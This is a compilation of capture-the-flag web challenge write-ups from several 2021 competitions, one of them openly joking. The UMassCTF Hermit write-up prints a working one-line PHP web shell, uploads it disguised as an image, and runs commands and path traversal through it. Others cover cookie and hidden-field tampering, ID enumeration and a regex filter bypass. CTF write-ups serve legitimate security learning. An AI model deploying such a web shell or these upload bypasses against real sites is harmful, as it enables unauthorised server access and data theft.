UMassCTF ’21: Web: Hermit – Part 2

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Hint 1:

Hint 2:

Going to the provided link in my browser, I get an invalid response error:

I then decide to netcat to that port to see what I can get:

Ahh, this is an SSH port.

Thinking back to the previous Hermit challenge, I notice this is the same IP, just a different port.

I go back to my one-line PHP shell that I uploaded and poke around some more.

I decide to run the whoami to see what user I am:

Now I check sudo – l to see what hermit can do:

Ahh, that looks interesting. I run that command:

That made it easy!

UMASS{a_test_of_integrity}

UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

I quick test image upload and I see how it works:

It uploaded the file and give a ling to see it. When I click the link to see it, It essentially prints the contents of the file as if it is text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

No I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}

Line CTF: Web: Welcome

This is for the 2021 Line CTF.

For this challenge, we are given he following link and information:

The link: https://linectf.me/2e5ef7f070966b1a50e811692bf1d362

Being cautious, I check out what appears to be a hex string in the link:

2e5ef7f070966b1a50e811692bf1d362

Thinking this could be an MD5 hash, I run hashid:

This confirmed my suspicions. Now I run hashcat on the hash with the popular rockyou wordlist:

After about 16 hours, the wordlist was exhausted and I still didn’t have an answer.

I then paid a Russian hacker to get the flag for me. We settled on a nominal $9,000 USD service fee.

actual photo

Unfortunately, he wasn’t able to get the flag for me and I wasn’t able to get my money back.

I then broke out my Ouija board and attempted to contact the spirits for help:

To my surprise, the spirits were very active and willing to help point me in the right direction.

They pointed me to the letters:

L I T T L E E A R L

Combining the letters I got “LITTLEEARL”, which I refined to “Little Earl”

This made me think for a while and I realized they were trying to get me to remember that my long lost 4-th great cousin Earl, who was very small (only 2’3″) used to rave about his favorite website: tinyurl.com

I know that TinyURL is great for shortening long URLs to make it easier to hide links to flags or other information. The problem was I needed the rest of the URL to get to what I needed.

After looking through the Line corporate website (the purveyors of the CTF), I found some interesting information on this page: https://careers.linecorp.com/

I realized that the following letters and numbers were used more than any other letters and numbers on the page and they ranked in the following order ( I repeated letters based on whimsy):

P A S S W O R D S G E N E R A T O R N E T

I realized this was a website! https://passwordgenerator.net

I went to that website and set the parameters on the page to what I would expect to see for the unique ID of a TinyURL link (combination of 8 numbers and lowercase letters):

I added the generated password the the TinyURL link that Cousin Earl loved and come up with this:

https://tinyurl.com/2hp3hf84

Browsing to the URL, I am directed to a GitHub repo (https://github.com/GMKdotUS/unwelcomeLineCTF):

Clicking the only file in the repo, I see a hint:

It took me a while, but I realized this was a Back to the Future reference… Time Travel!

I saw that this file had been edited so I looked at the previous file version to see if it had any information… like going back in time:

I see that the file originally contained a link!

https://linectf.me/2e5ef7f070966b1a50e811692bf1d362

At this point, I realize I should do a WGET of the link to see what it contains:

wget https://linectf.me/2e5ef7f070966b1a50e811692bf1d362

I performed the strings command on the downloaded file to see if there is anything interesting:

This resulted in a lot of cryptic code looking strings, so I grepped the command looking for a flag as follows:

strings 2e5ef7f070966b1a50e811692bf1d362 | grep LINECTF

Boom! I got the flag!!!

LINECTF{welcome_to_linectf}

I later learned that I could have just clicked on the link provided in the challenge description and would have got the flag as such:

In case you missed it, I was being a smartass. This was the easiest challenge I have ever seen, so I thought I would have some fun.

Vishwa CTF: Web: UwU (469)

This is from the 2021 Vishwa CTF

For this challenge, we are given a URL:

Going to the site, we are given this page:

After a little poking around, I look for a robots.txt entry:

Interesting! Now I follow the clue and look for a robots directory:

I click the link on the page for the source code and I get this:

After reviewing the code, I see that the PHP is looking for an input parameter “php_is_hard” and it runs “preg_replace()” on it and evaluates the output of that.

  if (isset($_GET['php_is_hard'])) {
  
    $you_enter = $_GET['php_is_hard'];
  
    $we_enter = 'suzuki_harumiya';
  
    $the_final_one = preg_replace(
    
      "/$we_enter/", '', $you_enter);
  
      if ($the_final_one === $we_enter) {
  
        open_up();
    }
  }

Analyzing this code, I see that it takes my input and looks for all instances of “suzuki_harumiya” and removes it. Then it compares the resulting string to “suzuki_harumiya”. If it is true, then it runs the “open_up()” function.

I see that I can simply manipulate my input to “ssuzuki_harumiyauzuki_harumiya” and the script will remove the single instance of “suzuki_harumiya” in it and the resulting string will, in fact, be “suzuki_harumiya”. When I feed that input, I get this:

UTCTF2021: Web: Oinker (100)

This is from the UTCTF2021 CTF

Challenge Author: a1c3

For this challenge, we are given a URL:

Going to the page gives me this:

Providing some input:

And submitting it gives me this:

I noticed that the URL has a number at the end “85”. I try to manipulate that number and see what it gives me:

I see that it gives me what appears to be previous “Oinks”. I enumerate up to get this:

And that is the flag.

UTCTF2021: Web: Cutest Cookie Clicker Rip-Off (100)

This is from the UTCTF2021 CTF

Challenge Author: Aya Abdelgawad

For this challenge we are given a little hint and a URL:

It is a game with an automatic timer that count’s down. You click the cookie to earn points. The high score is 1,000,000:

Given the name and theme of this game, I look to see what cookies it uses:

Neat, it stores my high score in a cookie. Let’s bake in a better score and refresh the page:

It applied my new highest score and is counting down:

When the clock runs out, it pops up with an alert containing the flag:

Vishwa CTF: Web: Redeeem (440)

This is from the 2021 Vishwa CTF

For this challenge, we are given a URL:

Going to the page, we get this:

Entering a coupon code does not appear to do anything. If we click the “BUY” button, we get this:

Inspecting the source, we see a hidden element named “current” with a value of “0”. This appears to be how my current balance is tracked.

I modify that element’s value to “7000” and then click the “BUY” button:

That gives us the flag!

UTCTF2021: Web: Source it!! (100)

This is from the UTCTF2021 CTF

Challenge Author: Rob H

For this challenge, we are given a little hint and a URL:

Here is the site:

I take a look at the source and find that it is doing client-side authentication in JavaScript:

I see that the password’s MD5 hash is “1bea3a3d4bc3be1149a75b33fb8d82bc”

A quick google search for that hash and I see that is has already been cracks and is “sherlock“.

I try logging in as admin with password sherlock and I’m in:

0x41414141 CTF: Register Secret PIN

This is from the 0x41414141 CTF.

When I went to register to compete in the 0x41414141 CTF I found that is was a little different from other CTFd based CTFs. Besides the normal registration information, it asks for a pin code (secret pin code for CTF registration).

Going back and looking through the site, I see on the About page that the secret pin code for CTF entry is hidden somewhere on the site:

After pouring through the source files for each page on the site, running curl POSTs, and looking at previous versions of the site on Archive.org, I considered the steganography approach.

Besides the normal social media link images, there are only two images on the site. One is the animated Offshift logo, which yielded no obvious results when running strings, binwalk, or other stego decoders:

The second image is a small Offshift logo that is used as the header logo:

After downloading this image, I ran strings on it to look for anything interesting:

Ahh! I see “secret: 100100100101” at the bottom of the results.

I convert the binary string to decimal:

echo "obase=10; ibase=2; 100100100101" | bc

Using the resulting decimal value as the pin, I am now able to register for the CTF.

0xL4ugh CTF: Web: Sad_Agent (200)

This is from the 0xL4ugh CTF.

For this challenge we are given a mildly cryptic description:

do you know … i have secret organization called sad can’t anyone access it by any browser and you should be sad to access and decode anything in your bad life link : http://168.61.3.216/sad_agent/¬†author : Sad Coder

When I go to the link, I get this page:

When I click the “chek” button, I get some information…

This tell me that the browser’s user agent property is important. Referring back to the challenge text, I believe I need to change my browser’s user agent property to “sad”, so I do this in Chrome’s Developer Tools…

After doing this, I click the “chek” button again and get better results. (I highlighted the black text that is over the black background).

Looking at the resulting source code, I see a strange value for a form input field.

Seeing the makeup of the value, I think it might be base64, so I decode it to…

Interesting! The page appears to take commands through this base64 encoded field. To do a POC, I encode a different command to see what it does…

I see that I get something different. Let’s go for the flag using:

show_source("index.php");

BINGO! The flag was imbedded in the PHP code.

This was a fun challenge. Thank you to Sad Coder. Hopefully you can find some happiness in this writeup!